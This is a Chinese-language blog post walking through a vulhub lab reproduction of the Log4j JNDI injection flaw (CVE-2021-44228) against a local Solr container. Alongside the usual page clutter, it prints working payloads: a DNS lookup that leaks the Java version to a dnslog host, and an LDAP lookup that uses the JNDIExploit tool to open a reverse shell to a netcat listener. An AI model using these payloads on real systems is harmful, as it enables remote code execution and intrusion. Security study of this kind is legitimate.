log4j-CVE-2021-44228-vulhub复现

最新推荐文章于 2024-05-28 09:08:35 发布
最新推荐文章于 2024-05-28 09:08:35 发布
阅读量4.9k 收藏 10
点赞数 2
分类专栏: 漏洞复现 vulhub 文章标签: log4j 乌鸦安全 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/122036527
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

 

01 漏洞描述

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

参考地址:

https://github.com/vulhub/vulhub

本次漏洞复现也是基于Vulhub

02 漏洞环境搭建

docker-compose up -d --build

图片

访问http://127.0.0.1:8983/solr/#/

图片

03 Dnslog测试

在DNSlog平台请求一个dns域名:3j7r1s.dnslog.cn

图片

构造:

${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload:

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3a5h27.dnslog.cn}

直接访问:

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.3j7r1s.dnslog.cn}

图片

此时直接得到版本信息:1.8.0

图片

或者是请求:

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://cd9097fd.dns.1433.eu.org}

图片

04 反弹shell

反弹shell需要使用JNDIExploit.v1.2,可以从下面百度云直接下载:

详细的信息可以参考上一篇文章

https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5


 

图片

网络拓扑:

图片

攻击机:10.211.55.23  

靶机:10.211.55.2

中转机:10.211.55.3 

中转机java版本:1.8.0_172

首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3

  其中:10.211.55.3为中转机的ip地址
 

图片

然后在攻击机上开启监听:nc -lvvp 6666

图片

此时构造如下命令:

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}

其中:

  • http://127.0.0.1:8983为靶机的地址

  • 10.211.55.3为中转机地址

  • 10.211.55.23为Kali攻击机ip地址,此时要反弹shell

更多用法可以参考:

https://github.com/zzwlpx/JNDIExploit

直接执行之后,shell就弹回来了

图片

此时在中转机器上:

图片

成功!

清除环境:docker-compose down

图片

05 注 意 事 项

中转机的java版本:1.8.0_172

图片

 

06 小插曲

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息! 

 

乌鸦安全
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
apache-log4j-2.17.0 核心jar包
03-31
Log4j 是一个日志记录框架,Log4j 2 是对 Log4j 的升级,提供了重大改进,超越其前身 Log4j 1.x,并提供...Log4j 团队已获悉一个安全漏洞 CVE-2021-45105,该漏洞已在 Java 8 及更高版本的 Log4j 2.17.0 中得到解决。
【vulhub漏洞】CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2237
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解
m0_62670778的博客
04-06 1240
Log4j2(Log for java)是Apache软件基金会下一个优秀的java程序日志监控组件Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x
记一次vulhub靶场Log4j CVE-2021-44228
weixin_53622191的博客
07-19 137
http://靶机ip:8983/solr/admin/cores?action = ${jndi : ldap : / / 攻击机ip : 1389 / Exploit}然后就会出这个页面几个端口的监听情况这里可以看到靶机是已经通过这个GET请求执行了我们的Exploit.class了,并且响应200成功这边7777也已经收到了反弹的shell,并且可以执行命令至此就已经成功了,最后要在进入你的漏洞目录,关闭你的靶场环境哦。
【vulhub】Log4j2:CVE-2021-44228漏洞
weixin_49422491的博客
09-13 2578
【vulhub】Log4j2:CVE-2021-44228漏洞
[CVE-2021-44228]:log4j2漏洞学习与流程详解(vulhub环境)
qq_46145027的博客
05-10 3480
刚搭好vulhub,迫不及待的来一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞的流程。
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
log4j-api-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)2.15.0-rc2版本(jar包名称仍为2.15.0,源码编译出来的)
log4j2漏洞CVE-2021-44228笔记(纯步骤过程,没有杂的知识点)
qq_41132792的博客
05-24 4611
纯粹的一个过程,小白向,没有杂的讲解,按照步骤一步步来就可以成功了。
[~/vulhub]/log4j/CVE-2021-44228-20221225
32bin的博客
12-25 474
┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$ cat docker-compose.yml version: ‘2’ services: solr: image: vulhub/solr:8.11.0 ports:┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$http://localhost:8983/solr/#/~logginghttp://localhost:8983/solr/admin/c
(vulhub环境搭建+)CVE-2021-44228 Apache Log4j 远程代码执行漏洞
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-14 7763
Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件,开发框架与Web应用中。Apache Log4j2组件中存在一个远程代码执行漏洞(CVE-2021-44832)。本文讲解如何搭建vulhub靶场并在vulhub环境中该漏洞以及反弹shell的操作。
Vulfocuslog4j2和vulhublog4j2(CVE-2021-44228)
人若有志,就不会在半坡停止。
11-07 876
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。Log4j 是一款开源 Java 日志记录工具。日志记录主要用来监视代码中变量的变化情况,周期性的记录到文件中供其他应用进行统计分析工作;跟踪代码运行时轨迹,作为日后审计的依据;担当集成开发环境中的调试器的作用,向文件或控制台打印代码的调试信息。
Log4j2注入漏洞(CVE-2021-44228)漏洞
m0_58596609的博客
10-10 1824
Log4j2注入漏洞(CVE-2021-44228)漏洞
代码质量与可维护性提升
偏执的小男孩儿
05-28 572
代码质量与可维护性提升
JS函数高级技巧之纯函数、高级函数、懒函数和函数组合
qq_42582773的博客
05-23 322
函数体里面会包含各种各样的条件语句,有时候这些条件语句仅仅需要执行一次,比如说我们写单例的时候判断某个对象是否为空,如果为空我们就创建一个对象,那其实我们知道后续只要程序还在运行,这个对象是不可能为空的,但是我们每次使用时都还会判断是否为空,都会执行我们的条件判断。上面的代码在每次执行的时候都会执行条件判断,这边还好,如果我们的条件判断非常杂,那其实也是一个不小的性能影响,这时候我们就可以使用懒函数的小技巧来优化代码。上面这个组合函数只能接收三个函数参数,这边我们编写一个接收任意数量的函数参数。
WX小程序源码小游戏类
最新发布
05-28
WX小程序源码小游戏类提取方式是百度网盘分享地址
Log4j-CVE-2017-5645
10-05
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值